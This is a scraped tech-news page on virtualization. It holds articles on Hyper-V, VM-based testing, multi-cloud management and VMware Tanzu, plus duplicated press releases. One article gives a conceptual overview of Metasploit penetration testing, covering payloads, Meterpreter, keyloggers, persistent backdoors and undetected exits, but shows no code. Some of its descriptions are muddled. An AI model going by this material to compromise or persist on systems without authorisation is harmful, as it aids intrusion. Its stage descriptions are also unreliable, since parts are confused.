Do You Need to Backup Hyper-V Virtual Machine

Today’s business-critical workloads are more technology driven than ever before. Virtualization technology has allowed organizations today to be able to make real use out of the powerful physical device hardware available. Microsoft’s Hyper-V hypervisor is gaining popularity and has matured over the last couple of releases in leaps and bounds. Especially with the new Storage Spaces Direct technology released with Windows Server 2016 and now with Windows Server 2019, organizations have a robust software-defined storage architecture on which to run production workloads.

Spotlight

Nexius

Nexius is unique in combining Technology Services, Software (big data analytics), and Network Engineering and Deployment to provide its clients with full network life cycle expertise. Through software automation and self-performance, Nexius is accelerating its clients’ network technology evolution. As a top-tier OCP member, founding member of TIP, and contributor to the open source IP ecosystem, Nexius is also accelerating the virtualization of networks through agile development, testing, and operational support of network functions.

OTHER ARTICLES
Server Hypervisors

VM Applications for Software Development and Secure Testing

Article | May 18, 2023

Contents 1. Introduction 2. Software Development and Secure Testing 3. Using VMs in Software Development and Secure Testing 4. Conclusion 1. Introduction “Testing is an infinite process of comparing the invisible to the ambiguous in order to avoid the unthinkable happening to the anonymous.” —James Bach. Testing software is crucial for identifying and fixing security vulnerabilities. However, meeting quality standards for functionality and performance does not guarantee security. Thus, software testing nowadays is a must to identify and address application security vulnerabilities to maintain the following: Security of data history, databases, information, and servers Customers’ integrity and trust Web application protection from future attacks VMs provide a flexible and isolated environment for software development and security testing. They offer easy replication of complex configurations and testing scenarios, allowing efficient issue resolution. VMs also provide secure testing by isolating applications from the host system and enabling a reset to a previous state. In addition, they facilitate DevOps practices and streamline the development workflow. 2. Software Development and Secure Testing Software Secure Testing: The Approach The following approaches must be considered while preparing and planning for security tests: Architecture Study and Analysis: Understand whether the software meets the necessary requirements. Threat Classification: List all potential threats and risk factors that must be tested. Test Planning: Run the tests based on the identified threats, vulnerabilities, and security risks. Testing Tool Identification: For software security testing tools for web applications, the developer must identify the relevant security tools to test the software for specific use cases. Test-Case Execution: After performing a security test, the developer should fix it using any suitable open-source code or manually. Reports: Prepare a detailed test report of the security tests performed, containing a list of the vulnerabilities, threats, and issues resolved and the ones that are still pending. Ensuring the security of an application that handles essential functions is paramount. This may involve safeguarding databases against malicious attacks or implementing fraud detection mechanisms for incoming leads before integrating them into the platform. Maintaining security is crucial throughout the software development life cycle (SDLC) and must be at the forefront of developers' minds while executing the software's requirements. With consistent effort, the SDLC pipeline addresses security issues before deployment, reducing the risk of discovering application vulnerabilities while minimizing the damage they could cause. A secure SDLC makes developers responsible for critical security. Developers need to be aware of potential security concerns at each step of the process. This requires integrating security into the SDLC in ways that were not needed before. As anyone can potentially access source code, coding with potential vulnerabilities in mind is essential. As such, having a robust and secure SDLC process is critical to ensuring applications are not subject to attacks by hackers. 3. Using VMs in Software Development and Secure Testing: Snapshotting: Snapshotting allows developers to capture a VM's state at a specific point in time and restore it later. This feature is helpful for debugging and enables developers to roll back to a previous state when an error occurs. A virtual machine provides several operations for creating and managing snapshots and snapshot chains. These operations let users create snapshots, revert to any snapshots in the chain, and remove snapshots. In addition, extensive snapshot trees can be created to streamline the flow. Virtual Networking: It allows virtual machines to be connected to virtual networks that simulate complex network topologies, allowing developers to test their applications in different network environments. This allows expanding data centers to cover multiple physical locations, gaining access to a plethora of more efficient options. This empowers them to effortlessly modify the network as per changing requirements without any additional hardware. Moreover, providing the network for specific applications and needs offers greater flexibility. Additionally, it enables workloads to be moved seamlessly across the network infrastructure without compromising on service, security, or availability. Resource Allocation: VMs can be configured with specific resource allocations such as CPU, RAM, and storage, allowing developers to test their applications under different resource constraints. Maintaining a 1:1 ratio between the virtual machine processor and its host or core is highly recommended. It's crucial to refrain from over-subscribing virtual machine processors to a single core, as this could lead to stalled or delayed events, causing significant frustration and dissatisfaction among users. However, it is essential to acknowledge that IT administrators sometimes overallocate virtual machine processors. In such cases, a practical approach is to start with a 2:1 ratio and gradually move towards 4:1, 8:1, 12:1, and so on while bringing virtual allocation into IT infrastructure. This approach ensures a safe and seamless transition towards optimized virtual resource allocation. Containerization within VMs: Containerization within VMs provides an additional layer of isolation and security for applications. Enterprises are finding new use cases for VMs to utilize their in-house and cloud infrastructure to support heavy-duty application and networking workloads. This will also have a positive impact on the environment. DevOps teams use containerization with virtualization to improve software development flexibility. Containers allow multiple apps to run in one container with the necessary components, such as code, system tools, and libraries. For complex applications, both virtual machines and containers are used together. However, while containers are used for the front-end and middleware, VMs are used for the back-end. VM Templates: VM templates are pre-configured virtual machines that can be used as a base for creating new virtual machines, making it easier to set up development and testing environments. A VM template is an image of a virtual machine that serves as a master copy. It includes VM disks, virtual devices, and settings. By using a VM template, cloning a virtual machine multiple times can be achieved. When you clone a VM from a template, the clones are independent and not linked to the template. VM templates are handy when a large number of similar VMs need to be deployed. They preserve VM consistency. To edit a template, convert it to a VM, make the necessary changes, and then convert the edited VM back into a new template. Remote Access: VMs can be accessed remotely, allowing developers and testers to collaborate more effectively from anywhere worldwide. To manage a virtual machine, follow these steps: enable remote access, connect to the virtual machine, and then access the VNC or serial console. Once connected, full permission to manage the virtual machine is granted with the user's approval. Remote access provides a secure way to access VMs, as connections can be encrypted and authenticated to prevent unauthorized access. Additionally, remote access allows for easier management of VMs, as administrators can monitor and control virtual machines from a central location. DevOps Integration: DevOps is a collection of practices, principles, and tools that allow a team to release software quickly and efficiently. Virtualization is vital in DevOps when developing intricate cloud, API, and SOA systems. Virtual machines enable teams to simulate environments for creating, testing, and launching code, ultimately preserving computing resources. While commencing a bug search at the API layer, teams find that virtual machines are suitable for test-driven development (TDD). Virtualization providers handle updates, freeing up DevOps teams, to focus on other areas and increasing productivity by 50 –60%. In addition, VMs allow for simultaneous testing of multiple release and patch levels, improving product compatibility and interoperability. 4. Conclusion The outlook for virtual machine applications is highly promising in the development and testing fields. With the increasing complexity of development and testing processes, VMs can significantly simplify and streamline these operations. In the future, VMs are expected to become even more versatile and potent, providing developers and testers with a broader range of tools and capabilities to facilitate the development process. One potential future development is integrating machine learning and artificial intelligence into VMs. This would enable VMs to automate various tasks, optimize the allocation of resources, and generate recommendations based on performance data. Moreover, VMs may become more agile and lightweight, allowing developers and testers to spin up and spin down instances with greater efficiency. The future of VM applications for software development and security testing looks bright, with continued innovation and development expected to provide developers and testers with even more powerful and flexible tools to improve the software development process.

Read More
Virtual Desktop Strategies

Managing Multi-Cloud Complexities for a Seamless Experience

Article | July 26, 2022

Introduction The early 2000s were milestone moments for the cloud. Amazon Web Services (AWS) entered the market in 2006, while Google revealed its first cloud service in 2007. Fast forward to 2020, when the pandemic boosted digital transformation efforts by around seven years (according to McKinsey), and the cloud has become a commercial necessity today. It not only facilitated the swift transition to remote work, but it also remains critical in maintaining company sustainability and creativity. Many can argue that the large-scale transition to the cloud in the 2010s was necessary to enable the digital-first experiences that remote workers and decentralized businesses need today. Multi-cloud and hybrid cloud setups are now the norm. According to Gartner, most businesses today use a multi-cloud approach to reduce vendor lock-in or to take advantage of more flexible, best-of-breed solutions. However, managing multi-cloud systems increases cloud complexity, and IT concerns, frequently slowing rather than accelerating innovation. According to 2022 research done by IntelligentCIO, the average multi-cloud system includes five platforms, including AWS, Microsoft Azure, Google Cloud, and IBM Red Hat, among others. Managing Multi-Cloud Complexities Like a Pro Your multi-cloud strategy should satisfy your company's requirements while also laying the groundwork for managing various cloud deployments. Creating a proactive plan for managing multi-cloud setups is one of the finest features that can distinguish your company. The five strategies for handling multi-cloud complexity are outlined below. Managing Data with AI and ML AI and machine learning can help manage enormous quantities of data in multi-cloud environments. AI simulates human decision-making and performs tasks as well as humans or even better at times. Machine learning is a type of artificial intelligence that learns from data, recognizes patterns, and makes decisions with minimum human interaction. AI and ML to help discover the most important data, reducing big data and multi-cloud complexity. AI and machine learning enable more simplicity and better data control. Integrated Management Structure Keeping up with the growing number of cloud services from several providers requires a unified management structure. Multiple cloud management requires IT time, resources, and technology to juggle and correlate infrastructure alternatives. Routinely monitor your cloud resources and service settings. It's important to manage apps, clouds, and people globally. Ensure you have the technology and infrastructure to handle several clouds. Developing Security Strategy Operating multiple clouds requires a security strategy and seamless integration of security capabilities. There's no single right answer since vendors have varied policies and cybersecurity methods. Storing data on many cloud deployments prevents data loss. Handling backups and safety copies of your data are crucial. Regularly examine your multi-cloud network's security. The cyber threat environment will vary as infrastructure and software do. Multi-cloud strategies must safeguard data and applications. Skillset Management Multi-cloud complexity requires skilled operators. Do you have the appropriate IT personnel to handle multi-cloud? If not, can you use managed or cloud services? These individuals or people are in charge of teaching the organization about how each cloud deployment helps the company accomplish its goals. This specialist ensures all cloud entities work properly by utilizing cloud technologies. Closing Lines Traditional cloud monitoring solutions are incapable of dealing with dynamic multi-cloud setups, but automated intelligence is the best at getting to the heart of cloud performance and security concerns. To begin with, businesses require end-to-end observability in order to see the overall picture. Add automation and causal AI to this capacity, and teams can obtain the accurate answers they require to better optimize their environments, freeing them up to concentrate on increasing innovation and generating better business results.

Read More
VMware, Vsphere, Hyper-V

Addressing Multi-Cloud Complexity with VMware Tanzu

Article | May 2, 2023

Introduction With cloud computing on the path to becoming the mother of all transformations, particularly in IT's ways of development and operations, we are once again confronted with the problem of conversion errors, this time a hundredfold higher than previous moves to dispersed computing and the web. While the issue is evident, the remedies are not so obvious. Cloud complexity is the outcome of the fast acceleration of cloud migration and net-new innovation without consideration of the complexity this introduces in operations. Almost all businesses are already working in a multi-cloud or hybrid-cloud environment. According to an IDC report, 93% of enterprises utilize multiple clouds. The decision could have stemmed from a desire to save money and avoid vendor lock-in, increase resilience, or businesses might have found themselves with several clouds as a result of the compounding activities of different teams. When it comes to strategic technology choices, relatively few businesses begin by asking, "How can we secure and control our technology?" Must-Follow Methods for Multi-Cloud and Hybrid Cloud Success Data Analysis at Any Size, from Any Source: To proactively recognize, warn, and guide investigations, teams should be able to utilize all data throughout the cloud and on-premises. Insights in Real-Time: Considering the temporary nature of containerized operations and functions as a service, businesses cannot wait minutes to determine whether they are experiencing infrastructure difficulties. Only a scalable streaming architecture can ingest, analyze, and alert rapidly enough to discover and investigate problems before they have a major impact on consumers. Analytics That Enables Teams to Act: Because multi-cloud and hybrid-cloud strategies do not belong in a single team, businesses must be able to evaluate data inside and across teams in order to make decisions and take action swiftly. How Can VMware Help in Solving Multi-Cloud and Hybrid-Cloud Complexity? VMware made several announcements indicating a new strategy focused on modern applications. Their approach focuses on two VMware products: vSphere with Kubernetes and Tanzu. Since then, much has been said about VMware's modern app approach, and several products have launched. Let's focus on VMware Tanzu. VMware Tanzu Tanzu is a product that enables organizations to upgrade both their apps and the infrastructure that supports them. In the same way that VMware wants vRealize to be known for cloud management and automation, Tanzu wants to be known for modern business applications. Tanzu uses Kubernetes to build and manage modern applications. In Tanzu, there is just one development environment and one deployment process. VMware Tanzu is compatible with both private and public cloud infrastructures. Closing Lines The important point is that the Tanzu portfolio offers a great deal of flexibility in terms of where applications operate and how they are controlled. We observe an increase in demand for operating an application on any cloud, and how VMware Tanzu assists us in streamlining the multi-cloud operation for MLOps pipeline. Apart from multi-cloud operation, it is critical to monitor and alarm each component throughout the MLOps lifecycle, from Kubernetes pods and inference services to data and model performance.

Read More
Virtual Desktop Tools, Server Hypervisors

Metasploitable: A Platform for Ethical Hacking and Penetration Testing

Article | June 8, 2023

Contents 1. Overview 2. Ethical Hacking and Penetration Testing 3. Metasploit Penetration Test 4. Why Choose Metasploit Framework for your Business? 5. Closing remarks 1. Overview Metasploitable refers to an intentionally vulnerable virtual machine that enables the learning and practice of Metasploit. Metasploit is one of the best penetration testing frameworks that helps businesses discover and shore up their systems' vulnerabilities before hackers exploit them. Security engineers use Metasploit as a penetration testing system and a development platform that allows the creation of security tools and exploits. Metasploit's various user interfaces, libraries, tools, and modules allow users to configure an exploit module, pair it with a payload, point it at a target, and launch it at the target system. In addition, Metasploit's extensive database houses hundreds of exploits and several payload options. 2. Ethical Hacking and Penetration Testing An ethical hacker is one who works within a security framework and checks for bugs that a malicious hacker might use to exploit networks. They use their experience and skills to render the cyber environment. To protect the infrastructure from the threat that hackers pose, ethical hacking is essential. The main purpose of an ethical hacking service is to report and assess the safety of the targeted systems and networks for the owner. Ethical hacking is performed with penetration test techniques to evaluate security loopholes. There are many techniques used to hack information, such as – Information gathering Vulnerability scanning Exploitation Test analysis Ethical hacking involves automatic methods. The hacking process without automated software is inefficient and time-consuming. There are several tools and methods that can be used for ethical hacking and penetration testing. The Metasploit framework eases the effort to exploit vulnerabilities in networks, operating systems, and applications and generates new exploits for new or unknown vulnerabilities. 3. Metasploit Penetration Test Reconnaissance: Integrate Metasploit with various reconnaissance tools to find the vulnerable spot in the system. Threat Modeling and Vulnerability Identification: Once a weakness is identified, choose an exploit and payload for penetration. Exploitation: The payload gets executed at the target if the exploit, a tool used to take advantage of system weakness, is successful, and the user gets a shell for interacting with the payload (a shellcode is a small piece of code used as the payload).The most popular payload, a set of malicious codes to attack Windows systems, is Meterpreter, an in-memory-only interactive shell. (Meterpreter is a Metasploit attack payload that provides an interactive shell for the attacker to explore the target machine and execute code.)Other payloads are: Static payloads (it enables port forwarding and communications between networks) Dynamic payloads (to evade antivirus software, it allows testers to generate unique payloads) Command shell payloads (enables users to run scripts or commands against a host) Post-Exploitation: Metasploit offers various exploitation tools for privilege escalation, packet sniffing, keyloggers, screen capture, and pivoting tools once on the target machine. Resolution and Re-Testing: Users set up a persistent backdoor if the target machine gets rebooted. These available features in Metasploit make it easy to configure as per the user's requirements. 4. Why Choose Metasploit Framework for your Business? Significant advantages of the Metasploit Framework are discussed below: Open-source: Metasploit Framework is actively developed as open-source software, so most companies prefer this to grow their businesses. Easy usage: It is very easy to use, defining an easy-naming conversation with the commands. This also facilitates the building of an extensive penetration test of the network. GUI Environment: It mainly provides third-party instances that are friendly. These interfaces ease the penetration testing projects by providing the facilities with services such as button clicks, over-the-fly vulnerability management, and easy-to-shift workspaces, among others. Cleaner Exits: Metasploit can cleanly exit without detection, even if the target system does not restart after a penetration test. Additionally, it offers various options for maintaining persistent access to the target system. Easy Switching Between Payloads: Metasploit allows testers to change payloads with the 'setpayload' command easily. It offers flexibility for system penetration through shell-based access or meterpreter. 5. Closing remarks From DevSecOps experts to hackers, everyone uses the Ruby-based open-source framework Metasploit, which allows testing via command-line alterations or GUI. Metasploitable is a vulnerable virtual machine ideally used for ethical hacking and penetration testing, in VM security. One trend likely to impact the future of Metasploitable is the increasing use of cloud-based environments for testing and production. It is possible that Metasploitable could be adapted to work in cloud environments or that new tools will be developed specifically for cloud-based penetration testing. Another trend that may impact the future of Metasploitable is the growing importance of automation in security testing. Thus, Metasploitable could be adapted to include more automation features. The future of Metasploitable looks bright as it continues to be a valuable tool for security professionals and enthusiasts. As the security landscape continues to evolve, it will be interesting to see how Metasploitable adapts to meet the community's changing needs.

Read More

Spotlight

Nexius

Nexius is unique in combining Technology Services, Software (big data analytics), and Network Engineering and Deployment to provide its clients with full network life cycle expertise. Through software automation and self-performance, Nexius is accelerating its clients’ network technology evolution. As a top-tier OCP member, founding member of TIP, and contributor to the open source IP ecosystem, Nexius is also accelerating the virtualization of networks through agile development, testing, and operational support of network functions.

Related News

Virtualized Environments

VeriSilicon Unveils the New VC9800 IP for Next Generation Data Centers

Business Wire | January 09, 2024

VeriSilicon today unveiled its latest VC9800 series Video Processor Unit (VPU) IP with enhanced video processing performance to strengthen its presence in the data center applications. The newly launched series IP caters to the advanced requirements of next generation data centers including video transcoding servers, AI servers, virtual cloud desktops, and cloud gaming. The VC9800 series of VPU IP boasts high performance, high throughput, and server-level multi-stream encoding and decoding capabilities. It can handle up to 256 streams and support all mainstream video formats, including the new advanced format VVC. Through Rapid Look Ahead encoding, the VC9800 series IP improves video quality significantly with low memory footprint and encoding latency. With capable of supporting 8K encoding and decoding, it offers enhanced video post-processing and multi-channel encoding at various resolutions, thus achieves an efficient transcoding solution. The VC9800 series of VPU IP can seamlessly interface with Neural Network Processor (NPU) IP, enabling a complete AI-video pipeline. When combined with VeriSilicon’s Graphics Processor Unit (GPU) IP, the subsystem solution is able to deliver enhanced gaming experiences. In addition, the hardware virtualization, super resolution image enhancement, and AI-enabled encoding functions of this series IP also offer effective solutions for virtual cloud desktops. “VeriSilicon’s advanced video transcoding technology continues leading in Data Center domain. We are working closely with global leading customers to develop comprehensive video processing subsystem solutions to meet the requirements of the latest Data Centers,” said Wei-Jin Dai, Executive VP and GM of IP Division of VeriSilicon. “For AI computing, our video post-processing capabilities have been extended to smoothly interact with NPUs, ensuring OpenCV-level accuracy. We’ve also introduced super resolution technology to the video processing subsystem, elevating image quality and ultimately enhancing user experiences for cloud computing and smart display.” About VeriSilicon VeriSilicon is committed to providing customers with platform-based, all-around, one-stop custom silicon services and semiconductor IP licensing services leveraging its in-house semiconductor IP.

Read More

Server Virtualization

Panasonic Automotive Introduces Neuron High-Performance Compute (HPC) to Advance to a Software-Defined Mobility Future

PR Newswire | January 09, 2024

Panasonic Automotive Systems Company of America, a tier-one automotive supplier and a division of Panasonic Corporation of North America, announced its High-Performance Compute (HPC) system. Named Neuron, this innovation addresses the rapidly evolving mobility needs anticipated for software-defined vehicle advancements. As vehicles become more software reliant, vehicle systems must support the extended software lifecycle by enabling software upgrades and prolonging the supporting hardware capability. Cars rely on hardware and software compute platforms to process, share, sense, and derive insights to handle functions for assisted driving. Panasonic Automotive's Neuron HPC allows for not only software updates and upgrades but also hardware upgrades across platform lifecycles. The Neuron HPC can aggregate multiple computing zones to reduce the cost, weight and integration complexity of the vehicle by removing redundant components. Panasonic Automotive's design supports effortless up-integration with high-performance and heavy data input processing capability. Importantly, the design is upgradeable, scalable and future-proof across today's evolving in-vehicle platforms. Neuron HPC Architecture & Design Panasonic Automotive's High Performance Compute architecture could reduce the number of distributed electronic control units (ECUs) by up to 80%1 – allowing for faster, lighter, cross-domain computing for real-time, cross-functional communications. The Neuron HPC design is suited for any mobility platform including internal combustion engine, hybrid, fuel cell or electric vehicles. "In collaboration with OEMs, Panasonic Automotive has designed and met some of the largest central compute platform challenges in the industry in order to make the driving experience evolve with technology," said Andrew Poliak, CTO, Panasonic Automotive Systems Company of America. "Neuron maximizes performance, safety and innovation over the entire ownership of the consumer's vehicle and enables OEMs with a future-proof SDV platform for ensuing generations of mobility needs." Key Systems, UX Features & Technical Benefits With a streamlined design, the Neuron HPC incorporates up-integration capability by consolidating multiple ECUs into one centralized nucleus to handle all levels of ADAS, chassis, body, and in-cabin infotainment features. About Panasonic Automotive Systems Company of America  Panasonic Automotive Systems Company of America is a division company of Panasonic Corporation of North America and is a leading global supplier of automotive infotainment and connectivity system solutions. Panasonic Automotive Systems Company of America acts as the North American affiliate of Panasonic Automotive Systems Co., Ltd., which coordinates global automotive. Panasonic Automotive Systems Company of America is headquartered in Peachtree City, Georgia, with sales, marketing and engineering operations in Farmington Hills, Mich. About Panasonic Corporation of North America Newark, NJ-based Panasonic Corporation of North America is committed to creating a better life and a better world by enabling its customers through innovations in Sustainable Energy, Immersive Entertainment, Integrated Supply Chains and Mobility Solutions. The company is the principal North American subsidiary of Osaka, Japan-based Panasonic Corporation. One of Interbrand's Top 100 Best Global Brands of 2023, Panasonic is a leading technology partner and integrator to businesses, government agencies and consumers across the region.

Read More

Server Virtualization

AELF Partners with ChainsAtlas to Pioneer Interoperability in Blockchain

PR Newswire | January 09, 2024

aelf is advancing cross-chain interoperability through a strategic partnership with ChainsAtlas. By utilising ChainsAtlas' innovative virtualisation technology, aelf will enable decentralised applications (dApps) from diverse blockchains to seamlessly migrate and integrate into the aelf blockchain, regardless of the dApps' smart contract specifications. This collaboration marks a significant step towards a globally interconnected and efficient blockchain ecosystem, breaking down the silos between blockchains. Khaniff Lau, Business Development Director at aelf, shares, "The strategic partnership with ChainsAtlas is a significant step towards realising our vision of a seamlessly interconnected blockchain world. With this integration, aelf is set to become a hub for cross-chain activities, enhancing our ability to support a wide array of dApps, digital assets, and Web2 apps. This collaboration is not just about technology integration; it's about shaping the future of how services and products on blockchains interact and operate in synergy." Jan Hanken, Co-founder of ChainsAtlas, says, "ChainsAtlas was always built to achieve two major goals: to make blockchain development accessible to a broad spectrum of developers and entrepreneurs and, along that path, to pave the way for a truly omnichain future." "By joining forces with aelf, we are bringing that visionary future much closer to reality. As we anticipate the influx of creativity from innovators taking their first steps into the world of Web3 on aelf, driven by ChainsAtlas technology, we are excited to see these groundbreaking ideas come to life," adds Hanken. The foundation for true cross-chain interoperability is being built as aelf integrates ChainsAtlas' Virtualization Unit (VU), enabling the aelf blockchain to accommodate both EVM and non-EVM digital assets. This cross-chain functionality is accomplished through ChainsAtlas' virtualisation technology, allowing aelf to interpret and execute smart contracts written in other languages supported by ChainsAtlas, while also establishing state transfer mechanisms that facilitate seamless data and asset flow between aelf and other blockchains. Through this partnership, aelf blockchain's capabilities will be enhanced as it is able to support a more comprehensive range of dApps and games, and developers from diverse coding backgrounds will now be empowered to build on aelf blockchain. This partnership will also foster increased engagement within the Web3 community as users can gain access to a more diverse range of digital assets on aelf. Looking ahead, the partnership between aelf and ChainsAtlas will play a pivotal role in advancing the evolution of aelf's sidechains by enabling simultaneous execution of program components across multiple VUs on different blockchains. About aelf aelf, a high-performance Layer 1 featuring multi-sidechain technology for unlimited scalability. aelf blockchain is designed to power the development of Web3 and support its continuous advancement into the future. Founded in 2017 with its global hub based in Singapore, aelf is one of the pioneers of the mainchain-sidechain architecture concept. Incorporating key foundational components, including AEDPoS, aelf's variation of a Delegated Proof-of-Stake (DPoS) consensus protocol; parallel processing; peer-to-peer (P2P) network communication; cross-chain bridges, and a dynamic side chain indexing mechanism, aelf delivers a highly efficient, safe, and modular ecosystem with high throughput, scalability, and interoperability. aelf facilitates the building, integrating, and deploying of smart contracts and decentralised apps (dApps) on its blockchain with its native C# software development kit (SDK) and SDKs in other languages, including Java, JS, Python, and Go. aelf's ecosystem also houses a range of dApps to support a flourishing blockchain network. aelf is committed to fostering innovation within its ecosystem and remains dedicated to driving the development of Web3 and the adoption of blockchain technology. About ChainsAtlas ChainsAtlas introduces a new approach to Web3 infrastructure, blending multiple blockchain technologies and smart contract features to create a unified, efficient processing network. Its core innovation lies in virtualization-enabled smart contracts, allowing consistent software operation across different blockchains. This approach enhances decentralized applications' complexity and reliability, promoting easier integration of existing software into the blockchain ecosystem. The team behind ChainsAtlas, driven by the transformative potential of blockchain, aims to foster global opportunities and equality. Their commitment to building on existing blockchain infrastructure marks a significant step towards a new phase in Web3, where advanced and reliable decentralized applications become the norm, setting new standards for the future of decentralized networks.

Read More

Virtualized Environments

VeriSilicon Unveils the New VC9800 IP for Next Generation Data Centers

Business Wire | January 09, 2024

VeriSilicon today unveiled its latest VC9800 series Video Processor Unit (VPU) IP with enhanced video processing performance to strengthen its presence in the data center applications. The newly launched series IP caters to the advanced requirements of next generation data centers including video transcoding servers, AI servers, virtual cloud desktops, and cloud gaming. The VC9800 series of VPU IP boasts high performance, high throughput, and server-level multi-stream encoding and decoding capabilities. It can handle up to 256 streams and support all mainstream video formats, including the new advanced format VVC. Through Rapid Look Ahead encoding, the VC9800 series IP improves video quality significantly with low memory footprint and encoding latency. With capable of supporting 8K encoding and decoding, it offers enhanced video post-processing and multi-channel encoding at various resolutions, thus achieves an efficient transcoding solution. The VC9800 series of VPU IP can seamlessly interface with Neural Network Processor (NPU) IP, enabling a complete AI-video pipeline. When combined with VeriSilicon’s Graphics Processor Unit (GPU) IP, the subsystem solution is able to deliver enhanced gaming experiences. In addition, the hardware virtualization, super resolution image enhancement, and AI-enabled encoding functions of this series IP also offer effective solutions for virtual cloud desktops. “VeriSilicon’s advanced video transcoding technology continues leading in Data Center domain. We are working closely with global leading customers to develop comprehensive video processing subsystem solutions to meet the requirements of the latest Data Centers,” said Wei-Jin Dai, Executive VP and GM of IP Division of VeriSilicon. “For AI computing, our video post-processing capabilities have been extended to smoothly interact with NPUs, ensuring OpenCV-level accuracy. We’ve also introduced super resolution technology to the video processing subsystem, elevating image quality and ultimately enhancing user experiences for cloud computing and smart display.” About VeriSilicon VeriSilicon is committed to providing customers with platform-based, all-around, one-stop custom silicon services and semiconductor IP licensing services leveraging its in-house semiconductor IP.

Read More

Server Virtualization

Panasonic Automotive Introduces Neuron High-Performance Compute (HPC) to Advance to a Software-Defined Mobility Future

PR Newswire | January 09, 2024

Panasonic Automotive Systems Company of America, a tier-one automotive supplier and a division of Panasonic Corporation of North America, announced its High-Performance Compute (HPC) system. Named Neuron, this innovation addresses the rapidly evolving mobility needs anticipated for software-defined vehicle advancements. As vehicles become more software reliant, vehicle systems must support the extended software lifecycle by enabling software upgrades and prolonging the supporting hardware capability. Cars rely on hardware and software compute platforms to process, share, sense, and derive insights to handle functions for assisted driving. Panasonic Automotive's Neuron HPC allows for not only software updates and upgrades but also hardware upgrades across platform lifecycles. The Neuron HPC can aggregate multiple computing zones to reduce the cost, weight and integration complexity of the vehicle by removing redundant components. Panasonic Automotive's design supports effortless up-integration with high-performance and heavy data input processing capability. Importantly, the design is upgradeable, scalable and future-proof across today's evolving in-vehicle platforms. Neuron HPC Architecture & Design Panasonic Automotive's High Performance Compute architecture could reduce the number of distributed electronic control units (ECUs) by up to 80%1 – allowing for faster, lighter, cross-domain computing for real-time, cross-functional communications. The Neuron HPC design is suited for any mobility platform including internal combustion engine, hybrid, fuel cell or electric vehicles. "In collaboration with OEMs, Panasonic Automotive has designed and met some of the largest central compute platform challenges in the industry in order to make the driving experience evolve with technology," said Andrew Poliak, CTO, Panasonic Automotive Systems Company of America. "Neuron maximizes performance, safety and innovation over the entire ownership of the consumer's vehicle and enables OEMs with a future-proof SDV platform for ensuing generations of mobility needs." Key Systems, UX Features & Technical Benefits With a streamlined design, the Neuron HPC incorporates up-integration capability by consolidating multiple ECUs into one centralized nucleus to handle all levels of ADAS, chassis, body, and in-cabin infotainment features. About Panasonic Automotive Systems Company of America  Panasonic Automotive Systems Company of America is a division company of Panasonic Corporation of North America and is a leading global supplier of automotive infotainment and connectivity system solutions. Panasonic Automotive Systems Company of America acts as the North American affiliate of Panasonic Automotive Systems Co., Ltd., which coordinates global automotive. Panasonic Automotive Systems Company of America is headquartered in Peachtree City, Georgia, with sales, marketing and engineering operations in Farmington Hills, Mich. About Panasonic Corporation of North America Newark, NJ-based Panasonic Corporation of North America is committed to creating a better life and a better world by enabling its customers through innovations in Sustainable Energy, Immersive Entertainment, Integrated Supply Chains and Mobility Solutions. The company is the principal North American subsidiary of Osaka, Japan-based Panasonic Corporation. One of Interbrand's Top 100 Best Global Brands of 2023, Panasonic is a leading technology partner and integrator to businesses, government agencies and consumers across the region.

Read More

Server Virtualization

AELF Partners with ChainsAtlas to Pioneer Interoperability in Blockchain

PR Newswire | January 09, 2024

aelf is advancing cross-chain interoperability through a strategic partnership with ChainsAtlas. By utilising ChainsAtlas' innovative virtualisation technology, aelf will enable decentralised applications (dApps) from diverse blockchains to seamlessly migrate and integrate into the aelf blockchain, regardless of the dApps' smart contract specifications. This collaboration marks a significant step towards a globally interconnected and efficient blockchain ecosystem, breaking down the silos between blockchains. Khaniff Lau, Business Development Director at aelf, shares, "The strategic partnership with ChainsAtlas is a significant step towards realising our vision of a seamlessly interconnected blockchain world. With this integration, aelf is set to become a hub for cross-chain activities, enhancing our ability to support a wide array of dApps, digital assets, and Web2 apps. This collaboration is not just about technology integration; it's about shaping the future of how services and products on blockchains interact and operate in synergy." Jan Hanken, Co-founder of ChainsAtlas, says, "ChainsAtlas was always built to achieve two major goals: to make blockchain development accessible to a broad spectrum of developers and entrepreneurs and, along that path, to pave the way for a truly omnichain future." "By joining forces with aelf, we are bringing that visionary future much closer to reality. As we anticipate the influx of creativity from innovators taking their first steps into the world of Web3 on aelf, driven by ChainsAtlas technology, we are excited to see these groundbreaking ideas come to life," adds Hanken. The foundation for true cross-chain interoperability is being built as aelf integrates ChainsAtlas' Virtualization Unit (VU), enabling the aelf blockchain to accommodate both EVM and non-EVM digital assets. This cross-chain functionality is accomplished through ChainsAtlas' virtualisation technology, allowing aelf to interpret and execute smart contracts written in other languages supported by ChainsAtlas, while also establishing state transfer mechanisms that facilitate seamless data and asset flow between aelf and other blockchains. Through this partnership, aelf blockchain's capabilities will be enhanced as it is able to support a more comprehensive range of dApps and games, and developers from diverse coding backgrounds will now be empowered to build on aelf blockchain. This partnership will also foster increased engagement within the Web3 community as users can gain access to a more diverse range of digital assets on aelf. Looking ahead, the partnership between aelf and ChainsAtlas will play a pivotal role in advancing the evolution of aelf's sidechains by enabling simultaneous execution of program components across multiple VUs on different blockchains. About aelf aelf, a high-performance Layer 1 featuring multi-sidechain technology for unlimited scalability. aelf blockchain is designed to power the development of Web3 and support its continuous advancement into the future. Founded in 2017 with its global hub based in Singapore, aelf is one of the pioneers of the mainchain-sidechain architecture concept. Incorporating key foundational components, including AEDPoS, aelf's variation of a Delegated Proof-of-Stake (DPoS) consensus protocol; parallel processing; peer-to-peer (P2P) network communication; cross-chain bridges, and a dynamic side chain indexing mechanism, aelf delivers a highly efficient, safe, and modular ecosystem with high throughput, scalability, and interoperability. aelf facilitates the building, integrating, and deploying of smart contracts and decentralised apps (dApps) on its blockchain with its native C# software development kit (SDK) and SDKs in other languages, including Java, JS, Python, and Go. aelf's ecosystem also houses a range of dApps to support a flourishing blockchain network. aelf is committed to fostering innovation within its ecosystem and remains dedicated to driving the development of Web3 and the adoption of blockchain technology. About ChainsAtlas ChainsAtlas introduces a new approach to Web3 infrastructure, blending multiple blockchain technologies and smart contract features to create a unified, efficient processing network. Its core innovation lies in virtualization-enabled smart contracts, allowing consistent software operation across different blockchains. This approach enhances decentralized applications' complexity and reliability, promoting easier integration of existing software into the blockchain ecosystem. The team behind ChainsAtlas, driven by the transformative potential of blockchain, aims to foster global opportunities and equality. Their commitment to building on existing blockchain infrastructure marks a significant step towards a new phase in Web3, where advanced and reliable decentralized applications become the norm, setting new standards for the future of decentralized networks.

Read More

Events